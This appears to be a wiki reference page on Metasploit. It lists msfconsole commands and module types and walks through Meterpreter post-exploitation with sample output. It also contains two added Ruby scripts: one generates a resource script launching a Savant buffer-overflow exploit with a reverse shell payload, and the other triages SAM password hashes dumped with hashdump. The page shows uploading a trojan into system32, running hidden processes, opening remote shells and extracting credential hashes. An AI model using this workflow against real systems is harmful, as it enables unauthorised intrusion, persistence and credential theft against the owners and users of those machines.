Metasploit

From Linuxmemo.


msfconsole shell

The basic msfconsole commands are help, info, set, show and use. A typical session against a single host looks like this:

show exploits
search 
use windows/http/savant_31_overflow
show options
set RHOST 192.168.1.5
show targets
set TARGET 0
show payloads
set PAYLOAD windows/shell/reverse_nonx_tcp
show options
exploit
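The same sequence can be replayed non-interactively from a resource script (msfconsole -r file.rc). The following Ruby helper is an added example, not code from the original page or from the Metasploit project: it emits that script from the exploit, target and payload used above, validates the addresses before anything is launched, and refuses a reverse payload without an LHOST. The exploit and payload names are the page's own; the listener address 192.168.1.10 and the file name savant.rc are assumptions.

```ruby
require 'ipaddr'

# Module and payload from the page's example; the addresses passed in below
# are assumptions to be replaced per engagement.
EXPLOIT = 'exploit/windows/http/savant_31_overflow'
PAYLOAD = 'windows/shell/reverse_nonx_tcp'

# True only for a syntactically valid IPv4 literal; hostnames and IPv6 are rejected.
def ipv4?(addr)
  IPAddr.new(addr.to_s).ipv4?
rescue IPAddr::InvalidAddressError
  false
end

# Returns the resource script as an array of msfconsole commands, in the order
# the page runs them: use, set RHOST/TARGET/PAYLOAD, show options, exploit.
# A reverse payload connects back to the attacker, so LHOST is mandatory for it.
# Note: current Metasploit releases name the target option RHOSTS.
def build_rc(rhost:, lhost: nil, target: 0, exploit: EXPLOIT, payload: PAYLOAD, rport: nil)
  raise ArgumentError, "RHOST #{rhost.inspect} is not an IPv4 address" unless ipv4?(rhost)
  reverse = payload.include?('reverse')
  raise ArgumentError, 'reverse payloads need LHOST' if reverse && lhost.nil?
  raise ArgumentError, "LHOST #{lhost.inspect} is not an IPv4 address" if lhost && !ipv4?(lhost)

  cmds = ["use #{exploit}", "set RHOST #{rhost}"]
  cmds << "set RPORT #{rport}" if rport
  cmds << "set TARGET #{Integer(target)}"
  cmds << "set PAYLOAD #{payload}"
  cmds << "set LHOST #{lhost}" if reverse
  cmds << 'show options'  # leave the final configuration in the console log
  cmds << 'exploit -j'    # -j runs the exploit as a background job
  cmds
end

# Writes the script to disk and returns its path (assumed file name: savant.rc).
def write_rc(path, **opts)
  File.write(path, build_rc(**opts).join("\n") + "\n")
  path
end

if __FILE__ == $PROGRAM_NAME
  puts build_rc(rhost: '192.168.1.5', lhost: '192.168.1.10').join("\n")
  # write_rc('savant.rc', rhost: '192.168.1.5', lhost: '192.168.1.10')
  # then: msfconsole -q -r savant.rc
end
```

The validation matters more than it looks: a typo in RHOST turns an exploit attempt against an agreed target into one against whatever host the typo names, so the script fails closed rather than letting msfconsole try.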

show options   Displays the list of options and their current values (those set with the set command)

show exploits   Displays the list of exploits

show targets   Displays the list of targets

show payloads   Displays the list of available payloads

show advanced   Displays the advanced options

Module tree

Auxiliary   Version 3.0 introduced auxiliary modules, which perform arbitrary actions that do not deliver a payload, such as port scanning or denial of service.

Encoder   Encoder modules re-encode a payload so that it avoids bytes the target cannot accept (bad characters such as null bytes).

Exploit   Exploit modules are the core modules of Metasploit.

Nop   NOP modules generate no-operation instruction sequences (NOP sleds) used to pad buffer overflow exploits.

Payload   Payloads are pieces of code (shellcode) executed once the exploit succeeds; they provide the communication channel between Metasploit and the victim.

meterpreter

  • help
The 'help' command, as may be expected, displays the Meterpreter help menu.
meterpreter > help
Core Commands
=============
   Command       Description
   -------       -----------
   ?             Help menu
   background    Backgrounds the current session
   channel       Displays information about active channels
...snip...


  • background
The 'background' command will send the current Meterpreter session to the background and return you to the msf prompt. To get back to your Meterpreter session, just interact with it again.
meterpreter > background
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >


  • ps
The 'ps' command displays a list of running processes on the target.
meterpreter > ps
Process list
============
   PID   Name                  Path
   ---   ----                  ----
   132   VMwareUser.exe        C:\Program Files\VMware\VMware Tools\VMwareUser.exe
   152   VMwareTray.exe        C:\Program Files\VMware\VMware Tools\VMwareTray.exe
   288   snmp.exe              C:\WINDOWS\System32\snmp.exe
...snip...


  • migrate
Using the 'migrate' post module, you can migrate to another process on the victim.
meterpreter > run post/windows/manage/migrate 
[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)
meterpreter >


  • ls
As in Linux, the 'ls' command will list the files in the current remote directory.
meterpreter > ls
Listing: C:\Documents and Settings\victim
=========================================
Mode              Size     Type  Last modified                   Name
----              ----     ----  -------------                   ----
40777/rwxrwxrwx   0        dir   Sat Oct 17 07:40:45 -0600 2009  .
40777/rwxrwxrwx   0        dir   Fri Jun 19 13:30:00 -0600 2009  ..
100666/rw-rw-rw-  218      fil   Sat Oct 03 14:45:54 -0600 2009  .recently-used.xbel
40555/r-xr-xr-x   0        dir   Wed Nov 04 19:44:05 -0700 2009  Application Data
...snip...


  • download
The 'download' command downloads a file from the remote machine. Note the doubled backslashes in the Windows path: the Meterpreter console treats a single backslash as an escape character.
meterpreter > download c:\\boot.ini
[*] downloading: c:\boot.ini -> c:\boot.ini
[*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
meterpreter >


  • upload
As with the 'download' command, you need to use double-slashes with the 'upload' command.
meterpreter > upload evil_trojan.exe c:\\windows\\system32
[*] uploading  : evil_trojan.exe -> c:\windows\system32
[*] uploaded   : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe
meterpreter >


  • ipconfig
The 'ipconfig' command displays the network interfaces and addresses on the remote machine.
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0
AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:10:f5:15
IP Address  : 192.168.1.104
Netmask     : 255.255.0.0
meterpreter >


  • getuid
Running 'getuid' will display the user that the Meterpreter server is running as on the host.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >


  • execute
The 'execute' command runs a program on the target. Here -f names the program, -i interacts with the new process through a channel, and -H hides it (no visible window on the victim's desktop).
meterpreter > execute -f cmd.exe -i -H
Process 38320 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>


  • shell
The 'shell' command will present you with a standard shell on the target system.
meterpreter > shell
Process 39640 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>


  • idletime
Running 'idletime' will display the number of seconds that the user at the remote machine has been idle.
meterpreter > idletime
User has been idle for: 5 hours 26 mins 35 secs
meterpreter >


  • hashdump

The 'hashdump' post module (post/windows/gather/hashdump) dumps the password hashes stored in the SAM database, one line per account. It needs SYSTEM privileges (check with getuid); from a lower-privileged session, run getsystem or migrate into a SYSTEM process first. The Meterpreter 'hashdump' command itself does the same job from the priv extension.
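What a tester does next with that output is triage. The following Ruby script is an added example, not code from the original page or from Metasploit: it parses the pwdump-style lines hashdump prints (user:RID:LMhash:NThash:::), skips the console's status lines, and flags the cases worth looking at first: blank passwords (the well-known empty NT hash), accounts whose LM hash is still stored (crackable far faster than NT), the built-in Administrator (RID 500), and accounts sharing an NT hash (password reuse). The sample dump and its non-empty hash values are constructed; only the two "empty" constants are real.

```ruby
# Well-known constants: the LM field holds EMPTY_LM when no LM hash is stored
# (LM disabled or password longer than 14 characters); the NT field holds
# EMPTY_NT for a blank password.
EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'

Entry = Struct.new(:user, :rid, :lm, :nt)

# Parses hashdump output. Lines that are empty, msfconsole status lines
# ("[*] ...") or otherwise not of the form user:rid:lm:nt::: are dropped.
def parse_hashdump(text)
  text.each_line.map { |raw|
    line = raw.strip
    next if line.empty? || line.start_with?('[')
    user, rid, lm, nt = line.split(':', 5)
    next unless rid =~ /\A\d+\z/ && lm =~ /\A\h{32}\z/ && nt =~ /\A\h{32}\z/
    Entry.new(user, rid.to_i, lm.downcase, nt.downcase)
  }.compact
end

# Groups the parsed accounts into the findings a tester reports first.
def triage(entries)
  {
    blank_password: entries.select { |e| e.nt == EMPTY_NT }.map(&:user),
    lm_stored:      entries.reject { |e| e.lm == EMPTY_LM }.map(&:user),
    builtin_admin:  entries.select { |e| e.rid == 500 }.map(&:user),
    shared_nt:      entries.reject { |e| e.nt == EMPTY_NT }
                           .group_by(&:nt).values
                           .select { |group| group.size > 1 }
                           .map { |group| group.map(&:user) },
  }
end

# Constructed sample in hashdump's format; the non-empty hash values are arbitrary.
SAMPLE_DUMP = <<~DUMP
  [*] Obtaining the boot key...
  [*] Dumping password hashes...
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  victim:1003:fedcba9876543210fedcba9876543210:deadbeefdeadbeefdeadbeefdeadbeef:::
  svc_backup:1005:aad3b435b51404eeaad3b435b51404ee:deadbeefdeadbeefdeadbeefdeadbeef:::
DUMP

if __FILE__ == $PROGRAM_NAME
  triage(parse_hashdump(SAMPLE_DUMP)).each { |finding, users| puts "#{finding}: #{users.inspect}" }
end
```

On the constructed sample this reports Guest as having a blank password, victim as the only account with an LM hash stored, Administrator as RID 500, and victim/svc_backup as sharing a password. Paste the real hashdump output in place of SAMPLE_DUMP, or read it from the msfconsole spool file.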
